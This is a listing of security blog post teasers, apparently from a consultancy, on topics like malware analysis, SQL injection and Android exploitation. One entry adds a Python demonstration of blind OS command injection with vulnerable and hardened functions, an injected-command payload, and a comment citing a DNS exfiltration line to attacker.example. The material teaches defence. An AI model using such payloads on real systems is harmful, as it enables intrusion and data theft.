Evasive Measures: "faxmessage.php" malware delivery
In the ongoing malware arms race, attackers are always trying to find creative ways to bypass detection, and this isn’t something that is limited to targeted threat actors. In fact some ingenious...
Automating Removal of Java Obfuscation
In this post we detail a method to improve analysis of Java code for a particular obfuscator; we document the process that was followed and demonstrate the results of automating our method. Obscurity...
Thanks for the Memories: Identifying Malware from a Memory Capture
We've all seen attackers try and disguise their running malware as something legitimate. They might use a file name of a legitimate Windows file or even inject code into a legitimate process that's...
RFID Tags in Access Control Systems
One of our recent engagements required us to explore an unknown RFID tag which was used as part of an access control system. The objective of this engagement was to find out how the RFID tag...
SQL Inception: How to select yourself
In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an...
Breaking the law: the legal sector remains an attractive target; why not turn...
The legal sector will remain an attractive target for the full spectrum of threat actors: cyber-criminals, hacktivists and state-sponsored groups. Unsurprisingly, this is due to the wealth of sensitive...
Wireless Gridlock in the IoT
“What good is a phone call when you are unable to speak?” Introduction: When people mention the Internet of Things (IoT) and congestion they’re likely referring to novel solutions to urban traffic...
The Emergence of Bluetooth Low Energy
Introduction: This blog is about Bluetooth Low Energy (BLE), which is the relatively new, lower-power version of the Bluetooth protocol. BLE was introduced in version 4.0 of the Bluetooth Core...
Manually Testing SSL/TLS Weaknesses
The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols aim to provide client and server systems with a means of establishing an encrypted communication channel. Though best known...
The recent US government data breach: big data techniques, a driving force...
The recent cyber-attack against the Office of Personnel Management (OPM) has resulted in the compromise of data relating to millions of current and former United States (US) government employees. In a...
Vulnerability Statistics & Trends in 2015
I have conducted research using Context’s penetration testing management database across 3,475 web application and infrastructure penetration tests for the years 2013, 2014 & 2015. The research...
DNSWatch - When a full DNS tunnel is just too much
During certain engagements it is a requirement to extract data from a network - or at least prove that it would be possible in different ways. One common and very well-known way to do this is to...
Wireless Phishing with Captive Portals
In this post we describe a simple technique that has been around for some time that is still relevant today given the proliferation of open access wireless networks. Most people will have seen multiple...
KGDB on Android: Debugging the kernel like a boss
A few months back I purchased the Android Hacker's Handbook. For those of you who haven't got a copy and are interested in the Android security landscape, I'd highly recommend it. The authors are all...
Good advice, a rare commodity?
Information is the lifeblood of effective cyber security. Without a current understanding of the threats, protections, technologies and best practices, cyber security activity will be divorced from the...
A Scout’s Guide to Incident Response
This part of our blog series, covering the recent work we have done with the Institution of Engineering and Technology, looks at incident response, drawing on the article we contributed to the...
Nation States: The Godfathers of Targeted Attacks
For many years the world of targeted cyber attacks was limited to nation states; few others had the understanding, resources or much to gain from carrying out such an attack. However our increased...
Hacking without Computers – An Introduction to Social Engineering
The concept of manipulating people and processes for some benefit pre-dates the invention of computers and the concept of cyber security, and goes well beyond the realms of IT and computing. Recently...
Alarm bells ringing!
We like to look at the security of consumer and commercial products, either as a product security evaluation for a customer or for our own interest. In previous blog posts we examined peripheral...
Make a Django app insecure? It's not easy and that's a good thing!
The OWASP Top 10 describes the most critical and most commonly occurring security flaws in web applications. This list is published every three years and although some issues move up the list and...
The Cyber Threat and Terrorism
The concept of cyber terrorism, or extremists utilising offensive cyber techniques, is one that gains wide publicity and grabs attention; but what is the reality of this threat? Russian-based Islamic...
Data Exfiltration via Blind OS Command Injection
On a penetration test or CTF challenge you may come across an application that takes user input and passes it to a system command or to a supporting program that runs a task on the underlying server....
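The pattern that teaser describes, as an added example that is not code from the Context article: a lookup feature concatenates user input into a shell command line, so anything after a `;` or inside `$( )` is executed even when the page never shows the output (the "blind" case). The `echo` binary stands in for the real supporting program (a `ping` or `nslookup` would have the same shape) so that the script runs anywhere with `/bin/sh`; the hostname regex and the marker string are assumptions made for the demonstration.

```python
"""Blind OS command injection: vulnerable, partially fixed and hardened forms.

Added example, not code from the article. `echo` stands in for the real
supporting program so the script runs anywhere with /bin/sh on PATH.
"""
import re
import subprocess

# Assumption: the feature only ever needs a DNS name or IPv4 literal.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def lookup_vulnerable(host: str) -> str:
    # Concatenates user input into a command line and hands it to /bin/sh.
    # In a blind scenario the caller never sees stdout, but the shell still
    # runs everything after ';', '|', '&&' or inside $( ). An attacker then
    # exfiltrates via a side channel (DNS lookups, HTTP callbacks, sleeps).
    cmd = "echo resolving " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_list_only(host: str) -> str:
    # Argument list, no shell: metacharacters reach the program literally,
    # so "; id" is just part of one argument. Still open to argument
    # injection (a value starting with "-"), so it is not sufficient alone.
    return subprocess.run(["echo", "resolving", host],
                          capture_output=True, text=True).stdout


def lookup_hardened(host: str) -> str:
    # Allow-list validation plus an argument list: no shell, no option injection.
    if host.startswith("-") or not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    return lookup_list_only(host)


def is_rejected(host: str) -> bool:
    """True when the hardened path refuses the value."""
    try:
        lookup_hardened(host)
    except ValueError:
        return True
    return False


def injected_command_ran(output: str) -> bool:
    # The marker appears only if the shell expanded $(id -u); the list-based
    # variant echoes the literal "$(id -u)" text instead.
    return "INJECTED-" in output and "$(" not in output


# Constructed payload: the echo stands in for an out-of-band channel such as
# "; nslookup $(id -u).attacker.example" or a conditional "sleep" probe.
PAYLOAD = "example.com; echo INJECTED-$(id -u)"

if __name__ == "__main__":
    print("vulnerable :", repr(lookup_vulnerable(PAYLOAD)))
    print("list only  :", repr(lookup_list_only(PAYLOAD)))
    print("hardened   :", "rejected" if is_rejected(PAYLOAD) else "accepted")
```

Run it and compare the three lines: the `shell=True` path prints the expanded marker, the list-only path prints the payload verbatim as a single argument, and the hardened path refuses the value before any process is spawned. Validation is still needed alongside the argument list because a value such as `-n` is a valid argument to most tools and changes their behaviour.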
Building a SOC: Thinking About Effective Incident Management
While incident response is what we most often talk about, we also do a lot of work helping clients to proactively build resiliency and develop their internal cyber security capability. This can range...
Minimising the time to remediation
One of the most popular talks at our summer Oasis 2016 event was delivered by Adam Bridge, Head of Forensics and looked at how organisations can reduce the time to remediation upon discovering a...
In the news: TalkTalk hit with record fine
It was announced recently that telecoms company TalkTalk has been fined £400,000 by the Information Commissioner’s Office (ICO) for failing to prevent the cyber-attack, which allowed an attacker to...
The Perils of Public Wireless Networks: How I Stole Your Hash
It’s a question that gets asked all the time – “How do I keep my computer secure online?” By now we should all know the usual recommendations, such as using unique and secure passwords and keeping your...
Targeting Android for OTA Exploitation
‘If you know the enemy and know yourself, you need not fear the result of a hundred battles’ – Sun Tzu. Whilst it is unlikely that Sun Tzu had software vulnerability research in mind when he wrote ‘The...
The Internet of Broken Things: why security testing matters
The recent Distributed Denial of Service (DDoS) attacks against the security journalist Brian Krebs’ blog and then the Domain Name Service (DNS) provider Dyn (which broke large chunks of the Internet...
Securing Corporate Mobile Devices
Mobile computing is well and truly ubiquitous, and has transformed the business world. But the risk of devices being stolen or compromised is a real threat to many organisations, which is why it is...
Mobile Malware State of Play
For a while we've been suggesting to our colleagues that mobile malware is not being dealt with as maturely as is desktop malware. Anecdotally, it seems like a lot of organisations - from both the...
Manipulating client-side variables in Java applications
Penetration testing of thick client applications is a common service performed at Context. For those unfamiliar with the term, in the context of application penetration testing, thick clients are any...
WAP just happened to my Samsung Galaxy?
This is the third in a series of blogs about how, even in 2017, SMS-based attacks on Android phones are still viable. In part one, Al described how to set up infrastructure to launch potential attacks....
User Awareness: An Important Tool in Protecting Your Organisation from Cyber...
Making your employees aware of the cyber threats they might face, both at work and at home, is an invaluable exercise. On its own, this activity is certainly not going to make your organisation...
Phwning the boardroom: hacking an Android conference phone
At Context we’re always on the lookout for interesting devices to play with. Sat in a meeting room one day, we noticed that the menus on the conference phone, a Mitel MiVoice Conference/Video Phone,...
Hacking Unicorns with Web Bluetooth
Some news broke yesterday about the CloudPets toy we've been looking at over the last few months. Researchers discovered an unsecured MongoDB server that exposed sensitive CloudPets customer data. My...
Forensic Imaging. So this should now boot... right?
Often within forensics an investigation can benefit from analysing the machine as the user would see it. This can lead to artefacts being found that may not be obvious when using our analytical...
Making an NTFS Volume Mountable by Tinkering with the VBR
We recently had to do disk forensics of 10 disks, each of which had a BitLocker encrypted C volume. We were working with E01s, but no real problem, the organisation's IT department provided us with...
The Resilient Road to Recovery
“It’s not a matter of if your network is compromised but when”. This phrase may be one of the tired clichés of cyber security, but it is true nonetheless. All organisations will be attacked and some...
Exploiting Vulnerable Pandas
There’s been some debate recently (see the work of Tavis Ormandy, Project Zero) around whether security applications such as Anti-Virus make devices more secure, or whether their greater attack surface...
WannaCry: What you need to know
Following the “WannaCry” cyber-attacks last Friday, we have put together a short briefing note with some essential information about the attack, what it is and how it works, and some immediate actions...
AppLocker Bypass via Registry Key Manipulation
AppLocker is the de facto standard for locking down Windows machines. It was introduced in Windows 7 and Windows Server 2008 R2 and is the successor to Software Restriction Policies (SRP). AppLocker is used by...
Lessons learned from WannaCry
In the wake of the WannaCry ransomware cyber-attack, which had such a significant impact on the UK’s NHS, amongst many other organisations worldwide, I am mindful of my simple mantra: Know your...
What is effective cyber security risk management?
Cyber services are currently going through an evolution, moving from the reactive to the proactive, as businesses wake up to the impact a cyber-attack can have on their operational output or...
Hacking the Virgin Media Super Hub
Introduction: Context’s Research team have looked at a large number of off-the-shelf home routers in the past and found them to be almost universally dreadful in terms of security posture. However, flagship...
Petya: What you need to know
Context has become aware of a new self-propagating variant of the “Petya” ransomware which spreads using the EternalBlue SMB exploit made famous by WannaCry. Like WannaCry, this malware variant contains...
The Neglected Dangers of Email Functionality
A great many web applications utilise email to implement functionality such as user self-registration, password reset or a simple 'contact us' form. What we know is that email is sent using one of...
What's a Security Operations Centre (SOC) and why should I care?
My previous blog post talked about cyber security risk management. This post explains the relevance and importance of a SOC and how this capability can reduce the risk to your network. As we have been...
On the Difficulties of Multi-Step Application Forms
In this two-part blog post we will discuss multi-step application forms. In part 1 we look at how such forms affect the effort estimate (“scoping”). In part 2 (in English)...
Testing Multi-Step Forms
In this two-part blog, we will be discussing multi-step forms. In part 1, we will see how multi-step forms affect scoping a test; while in part two we will go through techniques involved in testing...
Part I: An Overview of Firmware Storage Options
The security of a device’s firmware, as the first or an early part of a trusted chain, can have implications for the security of the whole system. At Context we often obtain the firmware for a device...